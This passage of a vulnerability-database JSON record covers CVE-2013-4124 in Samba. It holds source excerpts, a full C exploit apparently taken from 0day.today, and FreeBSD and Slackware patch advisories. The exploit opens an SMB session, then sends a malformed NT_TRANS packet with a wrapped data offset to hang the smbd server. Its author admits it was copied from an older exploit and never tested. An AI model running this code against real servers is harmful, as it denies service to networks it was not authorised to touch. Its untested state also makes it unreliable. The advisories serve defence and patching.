{\r\n...\r\n1148 /* We have already checked that ea_len <= data_count here. */\r\n1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,\r\n1150 ea_len);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2639 static void handle_nttrans(connection_struct *conn,\r\n2640 struct trans_state *state,\r\n2641 struct smb_request *req)\r\n2642 {\r\n...\r\n2651 /* Now we must call the relevant NT_TRANS function */\r\n2652 switch(state->call) {\r\n2653 case NT_TRANSACT_CREATE: // NT_TRANSACT_CREATE!\r\n2654 {\r\n2655 START_PROFILE(NT_transact_create);\r\n2656 call_nt_transact_create(\r\n2657 conn, req,\r\n2658 &state->setup, state->setup_count,\r\n2659 &state->param, state->total_param,\r\n2660 &state->data, state->total_data,\r\n2661 state->max_data_return);\r\n2662 END_PROFILE(NT_transact_create);\r\n2663 break;\r\n2664 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2770 /****************************************************************************\r\n2771 Reply to a SMBNTtrans.\r\n2772 ****************************************************************************/\r\n2773 \r\n2774 void reply_nttrans(struct smb_request *req) // smb_request!\r\n2775 {\r\n...\r\n2945 if ((state->received_data == state->total_data) &&\r\n2946 (state->received_param == state->total_param)) {\r\n2947 handle_nttrans(conn, state, req);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n[exploitability]\r\n \r\n * keywords:\r\n - samba incoming data\r\n - EA names\r\n - data\r\n - 0xf1000000\r\n - SMB NTTRANS\r\n - Samba reply_nttrans() Remote Root Exploit\r\n (http://www.securiteam.com/exploits/5TP0M2AAKS.html)\r\n - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)\r\n - SMBtrans\r\n - http://ubiqx.org/cifs/SMB.html\r\n \r\n \r\nThe security bug is remote dos to a daemon, the \r\nimpact is exist even though it's exploited on \r\nlocal network. If large local network exist and \r\nmany samba on the network, security risk is exist. \r\nI assign the dos impact to medium, and the apache \r\nor wuftpd dos to high because they are can be \r\nexploited on internet\r\n \r\n/*\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n CVE-2013-4124 samba remote dos private exploit\r\n \r\n \r\n ./samba_nttrans_exploit [target ip addr]\r\n \r\n * ... test ...:\r\n I didn't test for the exploit, I \r\n copied another samba nttrans exploit \r\n in 2003 that http://www.securiteam.co\r\n m/exploits/5TP0M2AAKS.html. It should \r\n be works!\r\n \r\n the exploit send malformed nttrans \r\n smb packet with large value of data \r\n offset to cause integer wrap in the \r\n vulnerable function of read_nttrns_ea_list\r\n \r\n I left an article that analyzed it\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n \r\n x90c\r\n \r\n*/\r\n \r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n \r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n \r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n \r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n \r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n \r\nstruct negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n \r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n \r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];\r\n};\r\n \r\nstruct nttrans_primary_request_header\r\n{ \r\n uint8 wordcount; \r\n uint8 maxsetupcount; \r\n uint8 flags[2];\r\n uint8 totalparamcount[4]; \r\n uint8 totaldatacount[4];\r\n uint8 maxparamcount[4];\r\n uint8 maxdatacount[4];\r\n uint8 paramcount[4];\r\n uint8 paramoffset[4];\r\n uint8 datacount[4];\r\n uint8 dataoffset[4]; // XXXX 0xf000000\r\n uint8 setupcount; \r\n uint8 function[2]; \r\n uint8 bytecount[2];\r\n};\r\n \r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS 0xA0\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n \r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint tid, pid, uid;\r\n \r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n \r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, \"malloc() failed\\n\");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else \r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n \r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n \r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n \r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n \r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n \r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, \r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n \r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n \r\n memcpy(base_hdr->protocol, \"\\xffSMB\", 4);\r\n \r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n \r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n \r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;\r\n uint32 capabilities = 0x50;\r\n \r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n \r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n \r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n \r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n \r\n bytecount = strlen(tconx_servername) + 15; \r\n \r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n memcpy(data, \"\\x00\\x5c\\x5c\", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername), \"\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\", 12);\r\n \r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n \r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n \r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n \r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ \r\n char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n \r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n \r\n tconx_servername = servername;\r\n \r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n \r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);\r\n \r\n write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n free(cn);\r\n free(sn);\r\n}\r\n \r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n \r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, \"read() a broken packet, aborting.\\n\"); \r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n \r\n if (len)\r\n { read(fd, (void *)&errorcode, 1); \r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = \"Not listening on called name\"; break;\r\n case 0x81 : errormsg = \"Not listening for calling name\"; break;\r\n case 0x82 : errormsg = \"Called name not present\"; break;\r\n case 0x83 : errormsg = \"Called name present, but insufficient resources\"; break;\r\n case 0x8f : errormsg = \"Unspecified error\"; break;\r\n default : errormsg = \"Unspecified error (unknown error code received!)\"; break;\r\n }\r\n fprintf(stderr, \"session request denied, reason: '%s' (code %i)\\n\", errormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf(\"session request granted\\n\");\r\n}\r\n \r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = \"\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS 1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0\" \\\r\n \"\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM 0.12\\x0\\x2\"\"FLATLINE'S KWAADWAAR\"; \r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n \r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n \r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n \r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), \r\n dialects, sizeof (dialects));\r\n \r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n}\r\n \r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header)));\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, \"protocol negotiation failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"protocol negotiation complete\\n\");\r\n}\r\n \r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = \"\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n \r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n \r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, \"session setup failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"session setup complete, got assigned uid %i\\n\", uid);\r\n}\r\n \r\nvoid tconx_request(int fd)\r\n{ \r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n \r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n free(packet);\r\n \r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n } \r\n}\r\n \r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n \r\n printf(\"tree connect complete, got assigned tid %i\\n\", tid);\r\n}\r\n \r\nvoid nttrans_request(int fd) { \r\n // packet = nbt session header + smb base header + nttrans header!\r\n char packet[sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header) + \r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nttrans_hdr; // nttrans header!\r\n int size=0;\r\n int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!\r\n int totalparamcount = TOTALCOUNT;\r\n int totaldatacount = 0;\r\n uint8 setupcount = 0;\r\n \r\n memset(&nttrans_hdr, 0, sizeof nttrans_hdr);\r\n \r\n // construct nbt session header\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n // construct smb base header\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);\r\n \r\n // construct nttrans header\r\n nttrans_hdr.paramoffset[0] = '\\x00';\r\n nttrans_hdr.paramoffset[1] = '\\x00';\r\n nttrans_hdr.paramoffset[2] = '\\x10';\r\n nttrans_hdr.paramoffset[3] = '\\xff';\r\n nttrans_hdr.dataoffset[0] = '\\x00'; // XXX data offset 0xff100000 to integer wrap\r\n nttrans_hdr.dataoffset[1] = '\\x00'; // the offset exploits the security bug of CVE-2013-4124\r\n nttrans_hdr.dataoffset[2] = '\\x10'; // samba remote dos\r\n nttrans_hdr.dataoffset[3] = '\\xff';\r\n \r\n nttrans_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nttrans_hdr.function, &function, sizeof (uint16));\r\n memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);\r\n \r\n // send samba packet!\r\n size = write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n}\r\n \r\nstatic char banner[]={\r\n\" ___ ___ \\n\" \\\r\n\" / _ \\\\ / _ \\\\ \\n\" \\\r\n\" __ __| (_) || | | | ___ \\n\" \\\r\n\" \\\\ \\\\/ / \\\\__. || | | | / __| \\n\" \\\r\n\" > < / / | |_| || (__ \\n\" \\\r\n\" /_/\\\\_\\\\ /_/ \\\\___/ \\\\___| \\n\" \\\r\n};\r\n \r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n struct sockaddr_in s_in;\r\n char target_ip[16];\r\n int smb_port=139;\r\n \r\n \r\n printf(\"%s\\n\\nsamba nttrans reply exploit\\n\\n\", banner);\r\n \r\n if(argc < 2){\r\n fprintf(stderr, \"samba nttrans reply exploit Usage:\\n\\n./samba_exploit [target ip addr]\\n\\n\");\r\n exit(-1);\r\n }\r\n \r\n strncpy(target_ip, argv[1], 16);\r\n \r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(smb_port); // samba port=139/tcp\r\n s_in.sin_addr.s_addr = inet_addr(target_ip);\r\n \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));\r\n \r\n // nbt(netbios over tcpip, nbtstat) session request\r\n nbt_session_request(fd, \"BOSSA\", \"SAMBA\"); // adjust computer names(clientname, servername)\r\n process_nbt_session_reply(fd);\r\n \r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n \r\n // session setup\r\n sesssetupx_request(fd); // setup request\r\n process_sesssetupx_reply(fd); // setup reply\r\n \r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n \r\n // exploit!\r\n printf(\"[*] nttrans reply exploit!\\n\");\r\n nttrans_request(fd);\r\n \r\n close(fd);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21146"}], "freebsd": [{"lastseen": "2019-05-29T18:33:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4124"], "description": "\nThe Samba project reports:\n\nAll current released versions of Samba are vulnerable to\n\t a denial of service on an authenticated or guest connection.\n\t A malformed packet can cause the smbd server to loop the CPU\n\t performing memory allocations and preventing any further service.\nA connection to a file share, or a local account is needed\n\t to exploit this problem, either authenticated or unauthenticated\n\t if guest connections are allowed.\n\n", "edition": 4, "modified": "2013-08-09T00:00:00", "published": "2013-08-05T00:00:00", "id": "E21C7C7A-0116-11E3-9E83-3C970E169BC2", "href": "https://vuxml.freebsd.org/freebsd/e21c7c7a-0116-11e3-9e83-3c970e169bc2.html", "title": "samba -- denial of service vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4124"], "description": "New samba packages are available for Slackware 13.1, 13.37, 14.0, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.0 ChangeLog:\n\npatches/packages/samba-3.6.17-i486-1_slack14.0.txz: Upgraded.\n This update fixes missing integer wrap protection in an EA list reading\n that can allow authenticated or guest connections to cause the server to\n loop, resulting in a denial of service.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4124\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/samba-3.5.22-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/samba-3.5.22-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/samba-3.5.22-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/samba-3.5.22-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/samba-3.6.17-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/samba-3.6.17-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.0.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.0.8-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\na12f92f452edd93b73427c6bfd3c4d65 samba-3.5.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n4407073cf9fc7c5f35262ccdb82596d4 samba-3.5.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne4d408030442d4813d9203cb8343c85c samba-3.5.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n924fab423b876104b1a5d8932ad75958 samba-3.5.22-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n8330068e6aa8da16951f298777b6270f samba-3.6.17-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nf2057040ae6cf84496711f6e1772f3a3 samba-3.6.17-x86_64-1_slack14.0.txz\n\nSlackware -current package:\n027e00b6b75e31e668f0759b2cb1d4e6 n/samba-4.0.8-i486-1.txz\n\nSlackware x86_64 -current package:\nf7685f1d964cc4bb04133fa6d986a2e4 n/samba-4.0.8-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg samba-3.6.17-i486-1_slack14.0.txz\n\nThen, if Samba is running restart it:\n\n > /etc/rc.d/rc.samba restart", "modified": "2013-08-06T07:20:57", "published": "2013-08-06T07:20:57", "id": "SSA-2013-218-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.432761", "type": "slackware", "title": "[slackware-security] samba", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}